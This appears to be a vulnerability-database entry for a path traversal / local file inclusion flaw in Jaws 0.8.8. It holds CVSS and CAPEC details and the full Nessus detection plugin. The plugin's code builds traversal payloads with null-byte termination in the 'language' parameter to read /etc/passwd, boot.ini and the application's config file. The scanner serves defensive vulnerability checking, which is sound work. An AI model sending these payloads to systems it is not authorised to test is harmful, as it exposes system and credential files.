Vulnerabilities > CVE-2009-0645 - Path Traversal vulnerability in Jaws 0.8.8

047910
CVSS 6.5 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
SINGLE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
jaws
CWE-22
nessus
exploit available

Summary

Directory traversal vulnerability in index.php in Jaws 0.8.8 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the (1) language, (2) Introduction_complete, and (3) use_log parameters, different vectors than CVE-2004-2445. Reference links indicate file inclusion and script or code execution in addition to information exposure.

Vulnerable Configurations

Part Description Count
Application
Jaws
1

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Relative Path Traversal
    An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.
  • Directory Traversal
    An attacker with access to file system resources, either directly or via application logic, will use various file path specification or navigation mechanisms such as ".." in path strings and absolute paths to extend their range of access to inappropriate areas of the file system. The attacker attempts to either explore the file system for recon purposes or access directories and files that are intended to be restricted from their access. Exploring the file system can be achieved through constructing paths presented to directory listing programs, such as "ls" and 'dir', or through specially crafted programs that attempt to explore the file system. The attacker engaging in this type of activity is searching for information that can be used later in a more exploitive attack. Access to restricted directories or files can be achieved through modification of path references utilized by system applications.
  • File System Function Injection, Content Based
    An attack of this type exploits the host's trust in executing remote content including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the attacker and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The attacker exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the attacker knows the standard handling routines and can identify vulnerabilities and entry points they can be exploited by otherwise seemingly normal content. Once the attack is executed, the attackers' program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.
  • Using Slashes and URL Encoding Combined to Bypass Validation Logic
    This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.
  • Manipulating Input to File System Calls
    An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

Exploit-Db

descriptionJaws 0.8.8 Multiple Local File Inclusion Vulnerabilities. CVE-2009-0645. Webapps exploit for php platform
fileexploits/php/webapps/7976.txt
idEDB-ID:7976
last seen2016-02-01
modified2009-02-04
platformphp
port
published2009-02-04
reporterfuzion
sourcehttps://www.exploit-db.com/download/7976/
titleJaws 0.8.8 - Multiple Local File Inclusion Vulnerabilities
typewebapps

Nessus

NASL familyCGI abuses
NASL idJAWS_LANGUAGE_MULTIPLE_LFI.NASL
descriptionJaws, a Framework and Content Management System for building dynamic websites, is installed on the remote system. The installed version fails to filter input to the
last seen2020-06-01
modified2020-06-02
plugin id35610
published2009-02-06
reporterThis script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/35610
titleJaws language Parameter Multiple Local File Includes
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if (description)
{
  script_id(35610);
  script_version("1.16");

  script_cve_id("CVE-2009-0645");
  script_bugtraq_id(33607);
  script_xref(name:"EDB-ID", value:"7976");

  script_name(english:"Jaws language Parameter Multiple Local File Includes");
  script_summary(english:"Attempts to retrieve a local file");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is susceptible
to multiple local file include attacks." );
 script_set_attribute(attribute:"description", value:
"Jaws, a Framework and Content Management System for building dynamic
websites, is installed on the remote system.  

The installed version fails to filter input to the 'language'
parameter before using it to include PHP code in '/upgrade/index.php'
and '/install/index.php'.  Regardless of PHP's 'register_globals' and
'magic_quotes_gpc' settings, an unauthenticated attacker can exploit
these issues to view arbitrary files or possibly to execute arbitrary
PHP code on the remote host, subject to the privileges of the web
server user id." );
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
 script_cwe_id(22);
 script_set_attribute(attribute:"plugin_publication_date", value: "2009/02/06");
 script_cvs_date("Date: 2018/06/13 18:56:27");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();


  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl", "os_fingerprint.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www",80);
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("http.inc");
include("misc_func.inc");
include("data_protection.inc");

port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);

# Try to retrieve a local file.
os = get_kb_item("Host/OS");
if (os)
{
  if ("Windows" >< os) file = '/boot.ini';
  else file = '/etc/passwd';
  files = make_list(file,'/config/JawsConfig.php');
}
else files = make_list('/etc/passwd', '/boot.ini','/config/JawsConfig.php');

file_pats = make_array();
file_pats['/etc/passwd'] = "root:.*:0:[01]:";
file_pats['/boot.ini'] = "^ *\[boot loader\]";
file_pats['/config/JawsConfig.php'] = "JawsConfig.php";

if (thorough_tests) 
{ 
  dirs = make_list("/jaws", "/blog", "/html","/jaws/html",cgi_dirs());
  urls = make_list("/upgrade/index.php","/install/index.php");
}
else
{ 
 dirs = make_list(cgi_dirs());
 urls = make_list("/upgrade/index.php");
}

# Try to exploit one of the flaws to read a file.

foreach u (urls)
{
  foreach dir (dirs)
  {
    url = string(dir,u);
    res = http_send_recv3(method:"GET", item:url, port:port);
    if (isnull(res)) exit(0);
    
    if ("Welcome to the Jaws" >< res[2])
    {  
      foreach file (files)
      {    
        if ("JawsConfig.php" >< file)
         exploit = string("..",file,"%00");
        else
         exploit = string("../../../../../../../../../../../../",file,"%00");
   
        req = http_mk_post_req(
          port        : port,
          version     : 11,
          item        : url,
          add_headers : make_array("Content-Type", "application/x-www-form-urlencoded"), 
          data        : string("language=",exploit)
         );
     
        res = http_send_recv_req(port:port, req:req);
        if (isnull(res)) exit(0);

        if (egrep(pattern:file_pats[file], string:res[2]) && "jaws/blog.css" >< res[2])
        {
          res[2] = res[2] - strstr(res[2], "?>");
  
          if (report_verbosity > 0)
          {   
            req_str = http_mk_buffer_from_req(req:req);

            if (".php" >< file)
              r = "Nessus could load a local .php file '";
             else
              r = "Nessus could retrieve the contents of file '";
 
            report = string ('\n',
             r, file,"\n", 
             "by sending the following POST request :\n\n",
             "  ", str_replace(find:'\n', replace:'\n', string:req_str),'\n'
            );

            res[2] = data_protection::redact_etc_passwd(output:res[2]);
            if (report_verbosity > 1)
              report = string(
                 report,'\n',
                 "Here's the result : \n\n",
                 crap(data:"-", length:30), " snip ", crap(data:"-", length:30), "\n",
                 res[2],"\n",
                 crap(data:"-", length:30), " snip ", crap(data:"-", length:30), "\n" 
              );
            security_hole(port:port, extra:report);
          }
          else
              security_hole(port);
          break;
         }  
      }
    }
  }   
}